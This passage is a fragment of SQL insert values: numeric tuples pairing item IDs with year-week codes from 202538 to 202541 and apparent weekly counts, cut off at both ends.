,(3253,1,'202538',141),(3265,1,'202538',141),(4651,1,'202538',141),(4706,1,'202538',141),(3263,1,'202538',142),(3313,1,'202538',142),(3430,1,'202538',142),(4703,1,'202538',142),(2063,1,'202538',143),(2161,1,'202538',143),(2658,1,'202538',143),(3249,1,'202538',143),(3259,1,'202538',143),(3438,1,'202538',143),(3738,1,'202538',143),(4771,1,'202538',143),(5037,1,'202538',143),(1699,1,'202538',144),(2148,1,'202538',144),(2609,1,'202538',144),(3027,1,'202538',144),(3251,1,'202538',144),(4654,1,'202538',144),(5050,1,'202538',144),(5054,1,'202538',144),(2150,1,'202538',145),(3752,1,'202538',145),(4765,1,'202538',145),(5020,1,'202538',145),(5024,1,'202538',145),(5046,1,'202538',145),(2165,1,'202538',146),(2178,1,'202538',146),(3735,1,'202538',146),(3087,1,'202538',147),(3245,1,'202538',147),(4408,1,'202538',147),(2152,1,'202538',148),(2154,1,'202538',148),(3240,1,'202538',148),(4382,1,'202538',148),(4648,1,'202538',148),(4688,1,'202538',148),(4709,1,'202538',148),(3006,1,'202538',149),(3531,1,'202538',149),(4797,1,'202538',149),(2964,1,'202538',150),(3724,1,'202538',150),(4792,1,'202538',150),(3004,1,'202538',151),(3005,1,'202538',151),(3243,1,'202538',151),(3498,1,'202538',151),(4700,1,'202538',151),(4802,1,'202538',151),(5042,1,'202538',151),(5253,1,'202538',151),(3275,1,'202538',152),(4323,1,'202538',152),(4329,1,'202538',152),(4335,1,'202538',152),(4893,1,'202538',152),(5280,1,'202538',152),(570,1,'202538',153),(2769,1,'202538',153),(3749,1,'202538',153),(4657,1,'202538',153),(4753,1,'202538',153),(4866,1,'202538',153),(1612,1,'202538',154),(1614,1,'202538',154),(2159,1,'202538',154),(3041,1,'202538',154),(3060,1,'202538',154),(3479,1,'202538',154),(3764,1,'202538',154),(4326,1,'202538',154),(4332,1,'202538',154),(4440,1,'202538',154),(4542,1,'202538',154),(4546,1,'202538',154),(4685,1,'202538',154),(5033,1,'202538',154),(5289,1,'202538',154),(1610,1,'202538',155),(1703,1,'202538',155),(1770,1,'202538',155),(1774,1,'202538',155),(2989,1,'202538',155),(3534,1,'202538',155),(3721,1,'202538',155),(3742,1,'202538',155),(4368,1,'202538',155),(4424,1,'202538',155),(4566,1,'202538',155),(4862,1,'202538',155),(5295,1,'202538',155),(5323,1,'202538',155),(1718,1,'202538',156),(4275,1,'202538',156),(4444,1,'202538',156),(4645,1,'202538',156),(4694,1,'202538',156),(4897,1,'202538',156),(5292,1,'202538',156),(2457,1,'202538',157),(2965,1,'202538',157),(3271,1,'202538',157),(3486,1,'202538',157),(4341,1,'202538',157),(4373,1,'202538',157),(4608,1,'202538',157),(4747,1,'202538',157),(4874,1,'202538',157),(4996,1,'202538',157),(5128,1,'202538',157),(1780,1,'202538',158),(1782,1,'202538',158),(2801,1,'202538',158),(3229,1,'202538',158),(3482,1,'202538',158),(4301,1,'202538',158),(4396,1,'202538',158),(4432,1,'202538',158),(4514,1,'202538',158),(4520,1,'202538',158),(4677,1,'202538',158),(4681,1,'202538',158),(4888,1,'202538',158),(5271,1,'202538',158),(5317,1,'202538',158),(5359,1,'202538',158),(1590,1,'202538',159),(2751,1,'202538',159),(3023,1,'202538',159),(3083,1,'202538',159),(3489,1,'202538',159),(3710,1,'202538',159),(4338,1,'202538',159),(4524,1,'202538',159),(4551,1,'202538',159),(5101,1,'202538',159),(5137,1,'202538',159),(5264,1,'202538',159),(1766,1,'202538',160),(1776,1,'202538',160),(2617,1,'202538',160),(3777,1,'202538',160),(4377,1,'202538',160),(4448,1,'202538',160),(4457,1,'202538',160),(4517,1,'202538',160),(4741,1,'202538',160),(4756,1,'202538',160),(5122,1,'202538',160),(5146,1,'202538',160),(5298,1,'202538',160),(5301,1,'202538',160),(2558,1,'202538',161),(2748,1,'202538',161),(3771,1,'202538',161),(4454,1,'202538',161),(4697,1,'202538',161),(5125,1,'202538',161),(5276,1,'202538',161),(478,1,'202538',162),(1594,1,'202538',162),(2704,1,'202538',162),(2956,1,'202538',162),(4556,1,'202538',162),(4976,1,'202538',162),(4988,1,'202538',162),(5131,1,'202538',162),(5330,1,'202538',162),(5353,1,'202538',162),(5363,1,'202538',162),(483,1,'202538',163),(484,1,'202538',163),(1584,1,'202538',163),(2911,1,'202538',163),(3226,1,'202538',163),(3774,1,'202538',163),(4582,1,'202538',163),(5058,1,'202538',163),(5248,1,'202538',163),(5304,1,'202538',163),(5307,1,'202538',163),(5314,1,'202538',163),(471,1,'202538',164),(472,1,'202538',164),(481,1,'202538',164),(4529,1,'202538',164),(4660,1,'202538',164),(4712,1,'202538',164),(4983,1,'202538',164),(5067,1,'202538',164),(5071,1,'202538',164),(5153,1,'202538',164),(5157,1,'202538',164),(5356,1,'202538',164),(5378,1,'202538',164),(5383,1,'202538',164),(5585,1,'202538',164),(477,1,'202538',165),(479,1,'202538',165),(482,1,'202538',165),(485,1,'202538',165),(2309,1,'202538',165),(4412,1,'202538',165),(4612,1,'202538',165),(5259,1,'202538',165),(5374,1,'202538',165),(5472,1,'202538',165),(476,1,'202538',166),(480,1,'202538',166),(1604,1,'202538',166),(4759,1,'202538',166),(5467,1,'202538',166),(488,1,'202538',167),(2775,1,'202538',167),(4750,1,'202538',167),(5163,1,'202538',167),(5334,1,'202538',167),(486,1,'202538',168),(1608,1,'202538',168),(2809,1,'202538',168),(5310,1,'202538',168),(5320,1,'202538',168),(1778,1,'202538',169),(1600,1,'202538',170),(2804,1,'202538',170),(5425,1,'202538',170),(469,1,'202538',171),(5062,1,'202538',171),(1544,1,'202538',172),(1598,1,'202538',173),(5420,1,'202538',174),(5454,1,'202538',174),(108,1,'202538',175),(5433,1,'202538',175),(5605,1,'202538',175),(5397,1,'202538',176),(5409,1,'202538',176),(5582,1,'202538',176),(84,1,'202538',177),(487,1,'202538',177),(5076,1,'202538',177),(5461,1,'202538',177),(5515,1,'202538',177),(5578,1,'202538',177),(74,1,'202538',178),(5449,1,'202538',178),(2813,1,'202538',179),(4722,1,'202538',179),(87,1,'202538',180),(4930,1,'202538',180),(5512,1,'202538',180),(473,1,'202538',181),(5400,1,'202538',181),(470,1,'202538',182),(5412,1,'202538',182),(5601,1,'202538',182),(5406,1,'202538',183),(5593,1,'202538',183),(335,1,'202538',184),(468,1,'202538',184),(474,1,'202538',185),(3781,1,'202538',187),(5436,1,'202538',188),(5561,1,'202538',189),(2904,1,'202538',190),(5502,1,'202538',190),(5570,1,'202538',191),(467,1,'202538',192),(5492,1,'202538',192),(5598,1,'202538',192),(5464,1,'202538',193),(1582,1,'202538',195),(5441,1,'202538',199),(91,1,'202538',208),(68,1,'202538',236),(2503,1,'202538',336),(89,1,'202538',494),(72,1,'202538',734),(80,1,'202538',1012),(9,1,'202538',3546),(106,1,'202539',1),(1697,1,'202539',3),(3109,1,'202539',4),(3541,1,'202539',4),(4858,1,'202539',4),(1695,1,'202539',5),(3092,1,'202539',5),(3104,1,'202539',5),(3107,1,'202539',5),(3714,1,'202539',5),(4668,1,'202539',5),(4691,1,'202539',5),(4878,1,'202539',5),(110,1,'202539',6),(3090,1,'202539',6),(3280,1,'202539',6),(3746,1,'202539',6),(4404,1,'202539',6),(4674,1,'202539',6),(4870,1,'202539',6),(5028,1,'202539',6),(5080,1,'202539',6),(5140,1,'202539',6),(5326,1,'202539',6),(1596,1,'202539',7),(1602,1,'202539',7),(1606,1,'202539',7),(2991,1,'202539',7),(4357,1,'202539',7),(4391,1,'202539',7),(4663,1,'202539',7),(4762,1,'202539',7),(3096,1,'202539',8),(3282,1,'202539',8),(4238,1,'202539',8),(4744,1,'202539',8),(4768,1,'202539',8),(5256,1,'202539',8),(5268,1,'202539',8),(1592,1,'202539',9),(3097,1,'202539',9),(4591,1,'202539',9),(5134,1,'202539',9),(102,1,'202539',10),(3038,1,'202539',10),(4776,1,'202539',10),(2297,1,'202539',11),(4587,1,'202539',11),(4977,1,'202539',11),(4980,1,'202539',11),(1734,1,'202539',12),(3287,1,'202539',14),(4387,1,'202539',14),(4400,1,'202539',14),(3102,1,'202539',16),(3297,1,'202539',17),(1728,1,'202539',18),(1588,1,'202539',20),(1586,1,'202539',23),(5489,1,'202539',24),(5457,1,'202539',30),(5415,1,'202539',32),(5428,1,'202539',32),(5567,1,'202539',33),(76,1,'202539',41),(2156,1,'202539',43),(1745,1,'202539',44),(1747,1,'202539',44),(1772,1,'202539',44),(1709,1,'202539',45),(2248,1,'202539',45),(2252,1,'202539',45),(2293,1,'202539',45),(2296,1,'202539',45),(1732,1,'202539',48),(3072,1,'202539',48),(1751,1,'202539',50),(4363,1,'202539',50),(4428,1,'202539',50),(3045,1,'202539',51),(3247,1,'202539',51),(4436,1,'202539',51),(1713,1,'202539',52),(1711,1,'202539',53),(1715,1,'202539',53),(1720,1,'202539',53),(3066,1,'202539',53),(3124,1,'202539',53),(1701,1,'202539',54),(1737,1,'202539',54),(1749,1,'202539',54),(2993,1,'202539',54),(3063,1,'202539',54),(3079,1,'202539',54),(3273,1,'202539',54),(1705,1,'202539',55),(1726,1,'202539',55),(1743,1,'202539',55),(1768,1,'202539',55),(3034,1,'202539',55),(3269,1,'202539',55),(3290,1,'202539',55),(4416,1,'202539',55),(4883,1,'202539',55),(1722,1,'202539',56),(3127,1,'202539',56),(3249,1,'202539',56),(5020,1,'202539',56),(5037,1,'202539',56),(1724,1,'202539',57),(2609,1,'202539',57),(3060,1,'202539',57),(3261,1,'202539',57),(3285,1,'202539',57),(5024,1,'202539',57),(5050,1,'202539',57),(1730,1,'202539',58),(1739,1,'202539',58),(2152,1,'202539',58),(2161,1,'202539',58),(3069,1,'202539',58),(3253,1,'202539',58),(3257,1,'202539',58),(3267,1,'202539',58),(3278,1,'202539',58),(3731,1,'202539',58),(5046,1,'202539',58),(1707,1,'202539',59),(1741,1,'202539',59),(2154,1,'202539',59),(2178,1,'202539',59),(3027,1,'202539',59),(3117,1,'202539',59),(3265,1,'202539',59),(3438,1,'202539',59),(4651,1,'202539',59),(4654,1,'202539',59),(5042,1,'202539',59),(1699,1,'202539',60),(2148,1,'202539',60),(3240,1,'202539',60),(3245,1,'202539',60),(4382,1,'202539',60),(4408,1,'202539',60),(4802,1,'202539',60),(5054,1,'202539',60),(2150,1,'202539',61),(2165,1,'202539',61),(3030,1,'202539',61),(3251,1,'202539',61),(3259,1,'202539',61),(3263,1,'202539',61),(3307,1,'202539',61),(3735,1,'202539',61),(3738,1,'202539',61),(5289,1,'202539',61),(4420,1,'202539',62),(4440,1,'202539',62),(4542,1,'202539',62),(4648,1,'202539',62),(4771,1,'202539',62),(2658,1,'202539',63),(3087,1,'202539',63),(3727,1,'202539',63),(4329,1,'202539',63),(4700,1,'202539',63),(4706,1,'202539',63),(4792,1,'202539',63),(4797,1,'202539',63),(5253,1,'202539',63),(2063,1,'202539',64),(3316,1,'202539',64),(4332,1,'202539',64),(4546,1,'202539',64),(4703,1,'202539',64),(5295,1,'202539',64),(570,1,'202539',65),(3275,1,'202539',65),(4323,1,'202539',65),(4862,1,'202539',65),(4866,1,'202539',65),(4897,1,'202539',65),(2751,1,'202539',66),(3229,1,'202539',66),(3243,1,'202539',66),(3430,1,'202539',66),(4326,1,'202539',66),(4341,1,'202539',66),(1776,1,'202539',67),(1782,1,'202539',67),(4338,1,'202539',67),(4424,1,'202539',67),(4444,1,'202539',67),(4566,1,'202539',67),(4657,1,'202539',67),(4765,1,'202539',67),(4874,1,'202539',67),(4893,1,'202539',67),(5359,1,'202539',67),(2457,1,'202539',68),(2964,1,'202539',68),(2965,1,'202539',68),(3226,1,'202539',68),(3271,1,'202539',68),(3742,1,'202539',68),(4368,1,'202539',68),(4396,1,'202539',68),(4645,1,'202539',68),(4709,1,'202539',68),(4976,1,'202539',68),(5280,1,'202539',68),(3479,1,'202539',69),(3486,1,'202539',69),(3489,1,'202539',69),(3774,1,'202539',69),(4275,1,'202539',69),(4517,1,'202539',69),(4753,1,'202539',69),(5276,1,'202539',69),(486,1,'202539',70),(1780,1,'202539',70),(2309,1,'202539',70),(2956,1,'202539',70),(3004,1,'202539',70),(3005,1,'202539',70),(3006,1,'202539',70),(3313,1,'202539',70),(3498,1,'202539',70),(3531,1,'202539',70),(3534,1,'202539',70),(3752,1,'202539',70),(3764,1,'202539',70),(3771,1,'202539',70),(4335,1,'202539',70),(4373,1,'202539',70),(4412,1,'202539',70),(4432,1,'202539',70),(4448,1,'202539',70),(4457,1,'202539',70),(4677,1,'202539',70),(4685,1,'202539',70),(4741,1,'202539',70),(4747,1,'202539',70),(4988,1,'202539',70),(5317,1,'202539',70),(472,1,'202539',71),(478,1,'202539',71),(480,1,'202539',71),(482,1,'202539',71),(483,1,'202539',71),(488,1,'202539',71),(1610,1,'202539',71),(1703,1,'202539',71),(1770,1,'202539',71),(2558,1,'202539',71),(2748,1,'202539',71),(2801,1,'202539',71),(3710,1,'202539',71),(3724,1,'202539',71),(3777,1,'202539',71),(4301,1,'202539',71),(4454,1,'202539',71),(4514,1,'202539',71),(4551,1,'202539',71),(4722,1,'202539',71),(4756,1,'202539',71),(5033,1,'202539',71),(5122,1,'202539',71),(5128,1,'202539',71),(5271,1,'202539',71),(5323,1,'202539',71),(5330,1,'202539',71),(1774,1,'202539',72),(2989,1,'202539',72),(3023,1,'202539',72),(4688,1,'202539',72),(4888,1,'202539',72),(5067,1,'202539',72),(5071,1,'202539',72),(5334,1,'202539',72),(477,1,'202539',73),(479,1,'202539',73),(481,1,'202539',73),(484,1,'202539',73),(1594,1,'202539',73),(1614,1,'202539',73),(2159,1,'202539',73),(2617,1,'202539',73),(2769,1,'202539',73),(2809,1,'202539',73),(2911,1,'202539',73),(3041,1,'202539',73),(3482,1,'202539',73),(4377,1,'202539',73),(4582,1,'202539',73),(4694,1,'202539',73),(4697,1,'202539',73),(4996,1,'202539',73),(5137,1,'202539',73),(5153,1,'202539',73),(5298,1,'202539',73),(5320,1,'202539',73),(5472,1,'202539',73),(1608,1,'202539',74),(1612,1,'202539',74),(2804,1,'202539',74),(4681,1,'202539',74),(4750,1,'202539',74),(5058,1,'202539',74),(5264,1,'202539',74),(5301,1,'202539',74),(5304,1,'202539',74),(5307,1,'202539',74),(5310,1,'202539',74),(5353,1,'202539',74),(469,1,'202539',75),(485,1,'202539',75),(1600,1,'202539',75),(1718,1,'202539',75),(1766,1,'202539',75),(5146,1,'202539',75),(5314,1,'202539',75),(5374,1,'202539',75),(476,1,'202539',76),(2704,1,'202539',76),(3749,1,'202539',76),(4524,1,'202539',76),(4556,1,'202539',76),(4608,1,'202539',76),(4712,1,'202539',76),(4759,1,'202539',76),(5101,1,'202539',76),(5292,1,'202539',76),(5356,1,'202539',76),(5383,1,'202539',76),(1590,1,'202539',77),(3083,1,'202539',77),(3721,1,'202539',77),(4520,1,'202539',77),(4660,1,'202539',77),(4983,1,'202539',77),(471,1,'202539',78),(1584,1,'202539',78),(4529,1,'202539',78),(5062,1,'202539',78),(5157,1,'202539',78),(5363,1,'202539',78),(5467,1,'202539',78),(4612,1,'202539',79),(5125,1,'202539',79),(487,1,'202539',80),(1604,1,'202539',80),(5131,1,'202539',80),(5378,1,'202539',80),(468,1,'202539',81),(5076,1,'202539',81),(5585,1,'202539',82),(1598,1,'202539',83),(5163,1,'202539',83),(5259,1,'202539',83),(473,1,'202539',84),(2775,1,'202539',84),(2813,1,'202539',84),(84,1,'202539',85),(1544,1,'202539',86),(5248,1,'202539',86),(5409,1,'202539',86),(5412,1,'202539',86),(74,1,'202539',87),(467,1,'202539',88),(5400,1,'202539',88),(108,1,'202539',89),(5433,1,'202539',89),(87,1,'202539',90),(4930,1,'202539',90),(5582,1,'202539',90),(474,1,'202539',91),(5601,1,'202539',91),(335,1,'202539',92),(5425,1,'202539',92),(5441,1,'202539',92),(5461,1,'202539',92),(5449,1,'202539',93),(5454,1,'202539',94),(5464,1,'202539',94),(5578,1,'202539',94),(1778,1,'202539',95),(5406,1,'202539',95),(5515,1,'202539',96),(5492,1,'202539',97),(5605,1,'202539',97),(5570,1,'202539',99),(5512,1,'202539',100),(3781,1,'202539',101),(5420,1,'202539',101),(5436,1,'202539',102),(2904,1,'202539',104),(5561,1,'202539',105),(91,1,'202539',106),(5397,1,'202539',107),(1582,1,'202539',109),(5593,1,'202539',110),(5598,1,'202539',110),(5502,1,'202539',113),(470,1,'202539',114),(68,1,'202539',148),(2503,1,'202539',162),(89,1,'202539',226),(72,1,'202539',337),(80,1,'202539',1358),(9,1,'202539',3300),(106,1,'202540',1),(2991,1,'202540',1),(3109,1,'202540',1),(4238,1,'202540',1),(3714,1,'202540',2),(4357,1,'202540',2),(4391,1,'202540',2),(4404,1,'202540',2),(4668,1,'202540',2),(4744,1,'202540',2),(4762,1,'202540',2),(1695,1,'202540',3),(1697,1,'202540',3),(3092,1,'202540',3),(3096,1,'202540',3),(3104,1,'202540',3),(3280,1,'202540',3),(3282,1,'202540',3),(3541,1,'202540',3),(4878,1,'202540',3),(5080,1,'202540',3),(5326,1,'202540',3),(102,1,'202540',4),(4387,1,'202540',4),(4663,1,'202540',4),(4691,1,'202540',4),(4870,1,'202540',4),(4980,1,'202540',4),(5028,1,'202540',4),(5134,1,'202540',4),(5140,1,'202540',4),(1596,1,'202540',5),(3090,1,'202540',5),(3287,1,'202540',5),(3746,1,'202540',5),(4674,1,'202540',5),(4768,1,'202540',5),(4858,1,'202540',5),(5256,1,'202540',5),(110,1,'202540',6),(1602,1,'202540',6),(1734,1,'202540',6),(3107,1,'202540',6),(4400,1,'202540',6),(3097,1,'202540',7),(4587,1,'202540',7),(5268,1,'202540',7),(4591,1,'202540',8),(1592,1,'202540',9),(4776,1,'202540',9),(4977,1,'202540',9),(1728,1,'202540',10),(2297,1,'202540',10),(3038,1,'202540',10),(1606,1,'202540',12),(3297,1,'202540',12),(1588,1,'202540',15),(3102,1,'202540',18),(5415,1,'202540',19),(1772,1,'202540',20),(2156,1,'202540',20),(2252,1,'202540',20),(2293,1,'202540',20),(2296,1,'202540',20),(1732,1,'202540',21),(1707,1,'202540',22),(1720,1,'202540',22),(1726,1,'202540',22),(1741,1,'202540',22),(1747,1,'202540',22),(3127,1,'202540',22),(3265,1,'202540',22),(3267,1,'202540',22),(3278,1,'202540',22),(4363,1,'202540',22),(5567,1,'202540',22),(1709,1,'202540',23),(1737,1,'202540',23),(1745,1,'202540',23),(2063,1,'202540',23),(2154,1,'202540',23),(3034,1,'202540',23),(3247,1,'202540',23),(4765,1,'202540',23),(76,1,'202540',24),(1586,1,'202540',24),(1713,1,'202540',24),(1730,1,'202540',24),(1739,1,'202540',24),(1743,1,'202540',24),(1751,1,'202540',24),(2248,1,'202540',24),(2609,1,'202540',24),(3063,1,'202540',24),(3263,1,'202540',24),(3269,1,'202540',24),(4416,1,'202540',24),(4428,1,'202540',24),(4436,1,'202540',24),(4648,1,'202540',24),(4703,1,'202540',24),(4883,1,'202540',24),(1715,1,'202540',25),(2152,1,'202540',25),(2165,1,'202540',25),(2993,1,'202540',25),(3027,1,'202540',25),(3124,1,'202540',25),(3249,1,'202540',25),(3261,1,'202540',25),(3735,1,'202540',25),(4654,1,'202540',25),(4771,1,'202540',25),(1749,1,'202540',26),(2148,1,'202540',26),(2150,1,'202540',26),(2161,1,'202540',26),(3030,1,'202540',26),(3072,1,'202540',26),(3229,1,'202540',26),(3273,1,'202540',26),(3316,1,'202540',26),(3438,1,'202540',26),(3727,1,'202540',26),(3731,1,'202540',26),(4514,1,'202540',26),(4688,1,'202540',26),(4706,1,'202540',26),(5489,1,'202540',26),(570,1,'202540',27),(1701,1,'202540',27),(1711,1,'202540',27),(1724,1,'202540',27),(1768,1,'202540',27),(3041,1,'202540',27),(3045,1,'202540',27),(3257,1,'202540',27),(3534,1,'202540',27),(3752,1,'202540',27),(4275,1,'202540',27),(4326,1,'202540',27),(4341,1,'202540',27),(4440,1,'202540',27),(4657,1,'202540',27),(4700,1,'202540',27),(4747,1,'202540',27),(5033,1,'202540',27),(5054,1,'202540',27),(1782,1,'202540',28),(2748,1,'202540',28),(3005,1,'202540',28),(3087,1,'202540',28),(3117,1,'202540',28),(3243,1,'202540',28),(3251,1,'202540',28),(3253,1,'202540',28),(3285,1,'202540',28),(3290,1,'202540',28),(3482,1,'202540',28),(3721,1,'202540',28),(3738,1,'202540',28),(3771,1,'202540',28),(4329,1,'202540',28),(4335,1,'202540',28),(4382,1,'202540',28),(4408,1,'202540',28),(4444,1,'202540',28),(4517,1,'202540',28),(4542,1,'202540',28),(4566,1,'202540',28),(4694,1,'202540',28),(4697,1,'202540',28),(4709,1,'202540',28),(4893,1,'202540',28),(5042,1,'202540',28),(5046,1,'202540',28),(5128,1,'202540',28),(5137,1,'202540',28),(5271,1,'202540',28),(5428,1,'202540',28),(477,1,'202540',29),(1705,1,'202540',29),(1722,1,'202540',29),(2178,1,'202540',29),(2658,1,'202540',29),(2965,1,'202540',29),(3004,1,'202540',29),(3006,1,'202540',29),(3069,1,'202540',29),(3079,1,'202540',29),(3226,1,'202540',29),(3245,1,'202540',29),(3307,1,'202540',29),(3430,1,'202540',29),(3479,1,'202540',29),(3531,1,'202540',29),(3742,1,'202540',29),(3764,1,'202540',29),(3777,1,'202540',29),(4332,1,'202540',29),(4368,1,'202540',29),(4420,1,'202540',29),(4524,1,'202540',29),(4651,1,'202540',29),(4792,1,'202540',29),(4866,1,'202540',29),(4897,1,'202540',29),(5024,1,'202540',29),(5037,1,'202540',29),(5153,1,'202540',29),(5289,1,'202540',29),(5301,1,'202540',29),(5320,1,'202540',29),(5457,1,'202540',29),(1610,1,'202540',30),(1614,1,'202540',30),(1770,1,'202540',30),(1774,1,'202540',30),(3060,1,'202540',30),(3066,1,'202540',30),(3259,1,'202540',30),(3275,1,'202540',30),(4338,1,'202540',30),(4396,1,'202540',30),(4424,1,'202540',30),(4546,1,'202540',30),(4677,1,'202540',30),(4753,1,'202540',30),(4797,1,'202540',30),(4802,1,'202540',30),(4888,1,'202540',30),(4976,1,'202540',30),(4988,1,'202540',30),(5020,1,'202540',30),(5058,1,'202540',30),(5067,1,'202540',30),(5122,1,'202540',30),(5125,1,'202540',30),(5146,1,'202540',30),(5276,1,'202540',30),(5304,1,'202540',30),(5314,1,'202540',30),(5323,1,'202540',30),(5356,1,'202540',30),(5359,1,'202540',30),(478,1,'202540',31),(479,1,'202540',31),(481,1,'202540',31),(482,1,'202540',31),(485,1,'202540',31),(1590,1,'202540',31),(1604,1,'202540',31),(1780,1,'202540',31),(2751,1,'202540',31),(2964,1,'202540',31),(2989,1,'202540',31),(3271,1,'202540',31),(3313,1,'202540',31),(3489,1,'202540',31),(3498,1,'202540',31),(3710,1,'202540',31),(4323,1,'202540',31),(4377,1,'202540',31),(4432,1,'202540',31),(4448,1,'202540',31),(4457,1,'202540',31),(4551,1,'202540',31),(4582,1,'202540',31),(4645,1,'202540',31),(4741,1,'202540',31),(4756,1,'202540',31),(4874,1,'202540',31),(5050,1,'202540',31),(5253,1,'202540',31),(5307,1,'202540',31),(5330,1,'202540',31),(5334,1,'202540',31),(480,1,'202540',32),(1612,1,'202540',32),(1776,1,'202540',32),(2159,1,'202540',32),(2558,1,'202540',32),(2617,1,'202540',32),(2801,1,'202540',32),(4301,1,'202540',32),(4373,1,'202540',32),(4412,1,'202540',32),(4685,1,'202540',32),(4750,1,'202540',32),(4862,1,'202540',32),(4996,1,'202540',32),(5131,1,'202540',32),(5298,1,'202540',32),(5310,1,'202540',32),(5317,1,'202540',32),(5353,1,'202540',32),(5378,1,'202540',32),(5383,1,'202540',32),(476,1,'202540',33),(483,1,'202540',33),(486,1,'202540',33),(1699,1,'202540',33),(2457,1,'202540',33),(2804,1,'202540',33),(3240,1,'202540',33),(3724,1,'202540',33),(4454,1,'202540',33),(4681,1,'202540',33),(4722,1,'202540',33),(5062,1,'202540',33),(5071,1,'202540',33),(5101,1,'202540',33),(5264,1,'202540',33),(5292,1,'202540',33),(5295,1,'202540',33),(5374,1,'202540',33),(471,1,'202540',34),(487,1,'202540',34),(488,1,'202540',34),(2775,1,'202540',34),(2809,1,'202540',34),(4529,1,'202540',34),(4608,1,'202540',34),(4612,1,'202540',34),(4712,1,'202540',34),(5280,1,'202540',34),(5467,1,'202540',34),(5472,1,'202540',34),(469,1,'202540',35),(484,1,'202540',35),(1584,1,'202540',35),(1594,1,'202540',35),(1703,1,'202540',35),(1718,1,'202540',35),(2309,1,'202540',35),(3486,1,'202540',35),(3774,1,'202540',35),(4520,1,'202540',35),(4759,1,'202540',35),(5157,1,'202540',35),(5248,1,'202540',35),(5400,1,'202540',35),(472,1,'202540',36),(1600,1,'202540',36),(1608,1,'202540',36),(2769,1,'202540',36),(3749,1,'202540',36),(4660,1,'202540',36),(1766,1,'202540',37),(2704,1,'202540',37),(2813,1,'202540',37),(4983,1,'202540',37),(84,1,'202540',38),(2911,1,'202540',38),(2956,1,'202540',38),(5259,1,'202540',38),(5363,1,'202540',38),(3023,1,'202540',39),(5425,1,'202540',39),(5163,1,'202540',40),(473,1,'202540',41),(3083,1,'202540',41),(4556,1,'202540',41),(4930,1,'202540',41),(5076,1,'202540',41),(5412,1,'202540',41),(5585,1,'202540',41),(1598,1,'202540',42),(335,1,'202540',43),(5515,1,'202540',43),(5601,1,'202540',43),(108,1,'202540',44),(1544,1,'202540',47),(5449,1,'202540',47),(468,1,'202540',48),(5397,1,'202540',48),(5582,1,'202540',48),(5605,1,'202540',48),(74,1,'202540',49),(5409,1,'202540',49),(5433,1,'202540',49),(5441,1,'202540',49),(5598,1,'202540',49),(2904,1,'202540',50),(5436,1,'202540',50),(5464,1,'202540',50),(5492,1,'202540',50),(467,1,'202540',51),(3781,1,'202540',51),(87,1,'202540',52),(1778,1,'202540',53),(474,1,'202540',55),(5454,1,'202540',55),(5512,1,'202540',55),(5461,1,'202540',56),(5561,1,'202540',57),(5593,1,'202540',58),(91,1,'202540',59),(5578,1,'202540',59),(5406,1,'202540',61),(5502,1,'202540',63),(5570,1,'202540',64),(2503,1,'202540',65),(5420,1,'202540',71),(1582,1,'202540',76),(68,1,'202540',98),(470,1,'202540',100),(89,1,'202540',116),(72,1,'202540',163),(80,1,'202540',922),(9,1,'202540',3272),(488,1,'202541',1),(570,1,'202541',1),(1610,1,'202541',1),(1703,1,'202541',1),(1770,1,'202541',1),(1782,1,'202541',1),(2965,1,'202541',1),(5046,1,'202541',1),(478,1,'202541',2),(481,1,'202541',2),(482,1,'202541',2),(484,1,'202541',2),(1699,1,'202541',2),(1707,1,'202541',2),(1737,1,'202541',2),(1745,1,'202541',2),(2248,1,'202541',2),(2964,1,'202541',2),(3041,1,'202541',2),(3097,1,'202541',2),(3257,1,'202541',2),(3280,1,'202541',2),(4412,1,'202541',2),(4870,1,'202541',2),(4883,1,'202541',2),(5058,1,'202541',2),(5071,1,'202541',2),(102,1,'202541',3),(471,1,'202541',3),(477,1,'202541',3),(479,1,'202541',3),(483,1,'202541',3),(486,1,'202541',3),(1590,1,'202541',3),(1592,1,'202541',3),(1614,1,'202541',3),(1720,1,'202541',3),(1732,1,'202541',3),(1749,1,'202541',3),(1768,1,'202541',3),(2063,1,'202541',3),(2293,1,'202541',3),(2558,1,'202541',3),(2748,1,'202541',3),(2801,1,'202541',3),(2956,1,'202541',3),(2993,1,'202541',3),(3072,1,'202541',3),(3092,1,'202541',3),(3107,1,'202541',3),(3261,1,'202541',3),(3275,1,'202541',3),(3278,1,'202541',3),(3285,1,'202541',3),(3287,1,'202541',3),(3541,1,'202541',3),(3738,1,'202541',3),(3774,1,'202541',3),(4373,1,'202541',3),(4387,1,'202541',3),(4396,1,'202541',3),(4416,1,'202541',3),(4440,1,'202541',3),(4654,1,'202541',3),(4668,1,'202541',3),(4685,1,'202541',3),(4765,1,'202541',3),(4802,1,'202541',3),(4996,1,'202541',3),(5054,1,'202541',3),(5067,1,'202541',3),(5153,1,'202541',3),(5253,1,'202541',3),(472,1,'202541',4),(476,1,'202541',4),(480,1,'202541',4),(485,1,'202541',4),(1584,1,'202541',4),(1602,1,'202541',4),(1606,1,'202541',4),(1697,1,'202541',4),(1741,1,'202541',4),(1743,1,'202541',4),(1747,1,'202541',4),(1751,1,'202541',4),(1774,1,'202541',4),(2148,1,'202541',4),(2152,1,'202541',4),(2156,1,'202541',4),(2159,1,'202541',4),(2161,1,'202541',4),(2178,1,'202541',4),(2296,1,'202541',4),(2457,1,'202541',4),(2769,1,'202541',4),(2809,1,'202541',4),(3079,1,'202541',4),(3104,1,'202541',4),(3229,1,'202541',4),(3243,1,'202541',4),(3245,1,'202541',4),(3265,1,'202541',4),(3271,1,'202541',4),(3273,1,'202541',4),(3430,1,'202541',4),(3714,1,'202541',4),(3721,1,'202541',4),(3771,1,'202541',4),(3777,1,'202541',4),(4238,1,'202541',4),(4301,1,'202541',4),(4329,1,'202541',4),(4338,1,'202541',4),(4357,1,'202541',4),(4377,1,'202541',4),(4382,1,'202541',4),(4408,1,'202541',4),(4424,1,'202541',4),(4436,1,'202541',4),(4448,1,'202541',4),(4457,1,'202541',4),(4551,1,'202541',4),(4657,1,'202541',4),(4691,1,'202541',4),(4768,1,'202541',4),(4862,1,'202541',4),(4897,1,'202541',4),(4976,1,'202541',4),(5020,1,'202541',4),(5037,1,'202541',4),(5101,1,'202541',4),(5122,1,'202541',4),(5137,1,'202541',4),(5295,1,'202541',4),(5304,1,'202541',4),(1594,1,'202541',5),(1604,1,'202541',5),(1701,1,'202541',5),(1713,1,'202541',5),(1726,1,'202541',5),(1734,1,'202541',5),(1772,1,'202541',5),(1776,1,'202541',5),(1780,1,'202541',5),(2154,1,'202541',5),(2252,1,'202541',5),(3004,1,'202541',5),(3087,1,'202541',5),(3096,1,'202541',5),(3226,1,'202541',5),(3249,1,'20254